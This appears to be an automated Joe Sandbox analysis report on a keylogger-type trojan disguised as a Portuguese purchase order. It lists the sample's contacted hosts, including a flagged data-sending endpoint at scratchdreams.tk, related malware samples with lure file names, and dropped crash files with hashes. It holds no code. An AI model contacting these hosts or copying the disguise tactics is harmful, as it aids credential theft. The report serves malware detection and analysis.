              https://scratchdreams.tk18%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              reallyfreegeoip.org
              		188.114.97.3
              		truetrueunknown
              scratchdreams.tk
              		188.114.97.3
              		truefalseunknown
              checkip.dyndns.com
              		132.226.8.169
              		truefalseunknown
              15.164.165.52.in-addr.arpa
              		unknown
              		unknowntrueunknown
              checkip.dyndns.org
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://reallyfreegeoip.org/xml/8.46.123.175false
              • Avira URL Cloud: safe
              		unknown
              http://checkip.dyndns.org/false
              • URL Reputation: safe
              		unknown
              https://scratchdreams.tk/_send_.php?TSfalse
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://reallyfreegeoip.org/xml/8.46.123.175$AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.microsoft.0AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://checkip.dyndns.org/qORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://scratchdreams.tkORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmpfalse
              • 18%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://reallyfreegeoip.orgAddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://reallyfreegeoip.orgAddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://upx.sf.netAmcache.hve.9.drfalse
              • URL Reputation: safe
              		unknown
              http://checkip.dyndns.orgAddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003169000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.microsoft.AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://checkip.dyndns.comAddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://scratchdreams.tkAddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmpfalse
              • 18%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              https://reallyfreegeoip.org/xml/ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003175000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              132.226.8.169
              		checkip.dyndns.comUnited States
              		16989UTMEMUSfalse
              188.114.97.3
              		reallyfreegeoip.orgEuropean Union
              		13335CLOUDFLARENETUStrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1446502
              Start date and time:2024-05-23 15:12:10 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 31s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:16
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:ORDEM DE COMPRA.exe
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winEXE@11/10@4/2
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 59%
              • Number of executed functions: 215
              • Number of non-executed functions: 48
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 104.208.16.94
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
              • Execution Graph export aborted for target ORDEM DE COMPRA.exe, PID 1756 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:13:01API Interceptor20x Sleep call for process: powershell.exe modified
              09:13:03API Interceptor11307945x Sleep call for process: AddInProcess32.exe modified
              09:13:07API Interceptor1x Sleep call for process: WerFault.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              132.226.8.169z25BNjJ88767909876500h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • checkip.dyndns.org/
              documents_24.5.13YTKargo.pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • checkip.dyndns.org/
              U prilogu je nova lista narudzbi.exeGet hashmaliciousSnake KeyloggerBrowse
              • checkip.dyndns.org/
              list of items.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • checkip.dyndns.org/
              DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • checkip.dyndns.org/
              VI3 Operation Guide_tech Info versionfdp.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
              • checkip.dyndns.org/
              request-2.doc.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
              • checkip.dyndns.org/
              Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
              • checkip.dyndns.org/
              FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
              • checkip.dyndns.org/
              z52OURO08765.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
              • checkip.dyndns.org/
              188.114.97.3WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
              http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
              • hjkie5.pages.dev/
              56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
              • qr-in.com/GDKZCby
              Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
              • qr-in.com/atBVKxq
              56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
              • qr-in.com/GDKZCby
              file.exeGet hashmaliciousUnknownBrowse
              • wagner3.net/admin
              Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
              • www.sba99prag.com/pshj/
              ORDIN.xlsGet hashmaliciousUnknownBrowse
              • qr-in.com/HDYwZbx
              ORDIN.xlsGet hashmaliciousUnknownBrowse
              • qr-in.com/HDYwZbx
              SSDQ115980924.exeGet hashmaliciousFormBookBrowse
              • www.ilodezu.com/z48v/

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              reallyfreegeoip.orgInvoice.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.97.3
              z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              z25BNjJ88767909876500h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 188.114.96.3
              FACT45780987600h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 188.114.97.3
              utradvices.scr.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              BANKOVN#U00cd SWIFT pdf.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              z51__________________________________.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              contract.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              z46PEDIDODECOMPRAURGENTE___F__D__P___.exeGet hashmaliciousSnake KeyloggerBrowse
              • 172.67.177.134
              z13FAT9654578987.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 172.67.177.134
              scratchdreams.tkInvoice.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              z25BNjJ88767909876500h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 188.114.96.3
              FACT45780987600h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 188.114.97.3
              utradvices.scr.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.97.3
              BANKOVN#U00cd SWIFT pdf.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              z51__________________________________.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              contract.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
              z46PEDIDODECOMPRAURGENTE___F__D__P___.exeGet hashmaliciousSnake KeyloggerBrowse
              • 104.21.27.85
              z13FAT9654578987.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 172.67.169.18
              checkip.dyndns.comInvoice.exeGet hashmaliciousSnake KeyloggerBrowse
              • 193.122.6.168
              z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousSnake KeyloggerBrowse
              • 158.101.44.242
              z25BNjJ88767909876500h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 132.226.8.169
              FACT45780987600h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 158.101.44.242
              z70ORDENDECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousSnake KeyloggerBrowse
              • 158.101.44.242
              utradvices.scr.exeGet hashmaliciousSnake KeyloggerBrowse
              • 158.101.44.242
              BANKOVN#U00cd SWIFT pdf.exeGet hashmaliciousSnake KeyloggerBrowse
              • 158.101.44.242
              z51__________________________________.exeGet hashmaliciousSnake KeyloggerBrowse
              • 132.226.247.73
              contract.exeGet hashmaliciousSnake KeyloggerBrowse
              • 193.122.6.168
              z46PEDIDODECOMPRAURGENTE___F__D__P___.exeGet hashmaliciousSnake KeyloggerBrowse
              • 193.122.6.168

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUShttp://chocolatefashiononline.comGet hashmaliciousUnknownBrowse
              • 104.19.178.52
              rPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 104.26.13.205
              https://lnk.sk/mzoyGet hashmaliciousUnknownBrowse
              • 172.67.176.2
              https://lnk.sk/twr3Get hashmaliciousUnknownBrowse
              • 104.21.48.17
              COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
              • 104.21.5.109
              t3h7DNer1Q.exeGet hashmaliciousAsyncRAT, DcRatBrowse
              • 104.16.185.241
              https://docs.google.com/forms/d/e/1FAIpQLSeRYIPr_Xs8SxtWD9VaAhgsz9aibS_bijyTwdbidiIQ4ngVlQ/viewform?embedded=true&entry.1325074572=http%3A%2F%2Fr.smtp.euro-symbiose.fr%2Ftr%2Fcl%2Fqrjz6G3WMajAukEuXu-N0Qebu__8ljHwQjs84-vbNFkstMs8BrqGB6auM8cV52vdc-z8kda-O1XzLDMdp-o1VJ_xiAbOzr9v5pxwTGj0Dst_LdwxxKSPofjHdg7nt8IDlgUJ3uTEcfUBoqUeYZ1z6UfsaMJ-LJXtWMT4Mwb9atjObh_1JANJ5jvL-GurRI94WpyXTvnXhmqNG1ThqZzYQSaX5jfeHHDV6kb8kSgWbW5xuXgTilqIdc91eM30NL2GhrRlNADqergaHf7cyAh4WnSBK&entry.731640200=build-verify+URL%3A+build+UrlParams%3A+build-verify+URL%3A+get+URL%3A+decrypt%3A+base64+decode%3A+illegal+base64+data+at+input+byte+280Get hashmaliciousUnknownBrowse
              • 1.1.1.1
              RE Fasthosts - Payment Failed.emlGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
              • 104.18.10.14
              https://url.uk.m.mimecastprotect.com/s/pk4ACO8rYSq23vcE1w2JGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              ELECTRONIC RECEIPT_Rockwool.htmlGet hashmaliciousUnknownBrowse
              • 104.17.25.14
              UTMEMUSyzKJORP7Q4.elfGet hashmaliciousMirai, MoobotBrowse
              • 132.192.117.117
              4rg5Y5MHO8.elfGet hashmaliciousMirai, MoobotBrowse
              • 132.192.117.117
              https://fm.solewe.com/?dl=1bf2e18efc6c3969c16b88a11bd91a04Get hashmaliciousUnknownBrowse
              • 132.226.214.62
              z25BNjJ88767909876500h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 132.226.8.169
              z51__________________________________.exeGet hashmaliciousSnake KeyloggerBrowse
              • 132.226.247.73
              documents_24.5.13YTKargo.pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 132.226.8.169
              NOVO_PEDIDO_DE_COMPRA_____pdf.exeGet hashmaliciousSnake KeyloggerBrowse
              • 132.226.247.73
              U prilogu je nova lista narudzbi.exeGet hashmaliciousSnake KeyloggerBrowse
              • 132.226.8.169
              list of items.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 132.226.8.169
              FAHJ98766700008022.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 132.226.247.73

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              54328bd36c14bd82ddaa0c04b25ed9adt3h7DNer1Q.exeGet hashmaliciousAsyncRAT, DcRatBrowse
              • 188.114.97.3
              f9oE743c23.exeGet hashmaliciousLimeRATBrowse
              • 188.114.97.3
              Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.97.3
              DEsFjZJcR0.exeGet hashmaliciousAsyncRATBrowse
              • 188.114.97.3
              SHIPPING DOCUMENT.PDF.exeGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              bMAplZixhH.exeGet hashmaliciousNjratBrowse
              • 188.114.97.3
              z64PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.97.3
              z25BNjJ88767909876500h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 188.114.97.3
              LsvjDwAj7O.exeGet hashmaliciousAsyncRATBrowse
              • 188.114.97.3
              FACT45780987600h.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
              • 188.114.97.3
              3b5074b1b5d032e5620f69f9f700ff0erPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 188.114.97.3
              ASCD0001 INQ9829......pdf.exeGet hashmaliciousAgentTeslaBrowse
              • 188.114.97.3
              Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.97.3
              msimg32.dllGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              https://url10.mailanyone.net/scanner?m=1s9Mri-0007hx-3T&d=4%7Cmail%2F90%2F1716287400%2F1s9Mri-0007hx-3T%7Cin10g%7C57e1b682%7C12862802%7C10019077%7C664C7952D245399BD4B163183C53C253&o=%2Fphte%3A%2Fdtsseedrontec.iuconsctomat%2Fku.&s=X3gWuPbJRU1Tmui7Qt2w30qEumEGet hashmaliciousHTMLPhisherBrowse
              • 188.114.97.3
              INVOICE.jsGet hashmaliciousAgentTeslaBrowse
              • 188.114.97.3
              Zam#U00f3w nr 90016288247_ ZNG_1406_MG_2024_004782922.pdf.exeGet hashmaliciousAgentTeslaBrowse
              • 188.114.97.3
              NEW ORDER.exeGet hashmaliciousAgentTeslaBrowse
              • 188.114.97.3
              dfzesJIgdr.exeGet hashmaliciousRedLine, VidarBrowse
              • 188.114.97.3
              pro-forma invoice.xlsm.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 188.114.97.3

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ORDEM DE COMPRA._91254e13668f945c2f47b2a799bdf1c6d5b84f_91d2ff47_ce427198-6557-43e4-8d33-11f601ed856b\Report.wer

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.1679389495550048
              Encrypted:false
              SSDEEP:192:d2ZCgzTu0UnU9aWBH+Dm8OIdzuiFUZ24lO88At2:gC8TVUnU9amH+KIzuiFUY4lO8b
              MD5:DF6396A88616A83B02E110554B0F153C
              SHA1:69F85B24B900905334F1287D4FEBD4214A8045DD
              SHA-256:BE73410D8F9CDE838C31F6F0EEE87C199E27FBC9D837B177CA415FC69FAE3FEF
              SHA-512:41BBEC05FB51CE5273FE2D5F7F42AEFFCAA20F507EB825696B2FFB2B4F21BF656FA957F6DAC6BBAB2AC05441EE63B96B78F366E84272ADC88B01CB5A1F029F30
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.9.4.3.5.8.1.0.2.5.8.5.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.4.3.5.8.2.1.5.0.8.5.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.4.2.7.1.9.8.-.6.5.5.7.-.4.3.e.4.-.8.d.3.3.-.1.1.f.6.0.1.e.d.8.5.6.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.7.d.0.0.c.e.-.c.7.6.c.-.4.0.0.9.-.a.1.2.1.-.1.9.b.9.f.a.f.b.a.9.9.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.O.R.D.E.M. .D.E. .C.O.M.P.R.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.n.o.q.u.n.o.m.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.d.c.-.0.0.0.1.-.0.0.1.5.-.d.2.e.f.-.a.7.e.c.1.2.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.e.2.4.6.1.2.7.d.9.2.9.d.2.3.2.9.1.0.3.1.0.2.c.d.e.8.f.1.b.9.f.0.0.0.0.0.0.0.0.!.0.0.0.0.8.c.b.d.3.3.b.3.c.f.5.1.9.8.0.7.b.2.c.9.8.6.f.7.f.b.e.3.d.a.a.e.4.1.7.5.5.9.5.f.!.O.R.D.E.M. .D.E. .

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5FE.tmp.dmp

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 16 streams, Thu May 23 13:13:01 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):514232
              Entropy (8bit):3.383319972707714
              Encrypted:false
              SSDEEP:6144:QpRHAPgCy66SCKsMegvqA3QhG3uOkCb47zSS:QpseMZqUQrCo
              MD5:268DEC99D6D8F574D8248CEF30EFD244
              SHA1:058E76BA93EDFD3CC8D537F55B506C2062D16023
              SHA-256:B878B4F6F9730E649982F8DB85A8CAC94EBD20C76D36EF17A798F3D3347E554D
              SHA-512:1285D868F24BFF33F020601D3691DEF8BA0E25C119DD5B9826C02C10C99D3E559F650D35E8E1DD3892C0A81E0D8B2A69D9E6FE39FC9FF11FD455AD477F1ABB88
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... ........@Of............t.......................$...H&.......5..l&......Tt.............l.......8...........T............9...............\...........]..............................................................................eJ.......^......Lw......................T............@Of.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE90C.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8626
              Entropy (8bit):3.7142593366814274
              Encrypted:false
              SSDEEP:192:R6l7wVeJeKyY6Y2D+mJ31gmfeLGprG89bjUWfMhm:R6lXJLd6YiJlgmfeLcjlfH
              MD5:A71F4FF74D27517E98C0350DFD51B5AE
              SHA1:855D4AD75C5D5FE0B58E85A5A1C2B6175822D763
              SHA-256:06A34A4A478EBC248E61A1D55EF8D537A1D40AD4F5E0C7C29FED3971EC641453
              SHA-512:4BCF515BADC3F5C44BFFA96B0A7D93B0D89783893CD1FB789282175CD51F42131E3F237990341525ECF4C35A292EECB8B19266C9B45875E7B09BA3CCFD38049A
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.5.6.<./.P.i.

              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE97A.tmp.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4785
              Entropy (8bit):4.541976125176462
              Encrypted:false
              SSDEEP:48:cvIwWl8zs0Jg771I9UPWpW8VYLHPYm8M4JL9nWDFByq85XNvD6sKx3xwd:uIjfyI7Pe7V8HSJxwGLJShwd
              MD5:9A244CEB80E44FF1151F9A77A89230B2
              SHA1:AE9F688746E2BC75C1D1F963D9523832ACA58E35
              SHA-256:114E0A39C6899CC76C88B7436519DCF9F9CA30781C5FA63FC9ED2DDEF0160920
              SHA-512:0BD93E14A6B1823DCFB5377B4F93252435C8C27978DD6BF8E695D716769994AB0D6A0F58309786BD3A8A33F3ABF9D97DE346A01EAAA987DBAF36696941D34AE5
              Malicious:false
              Reputation:low
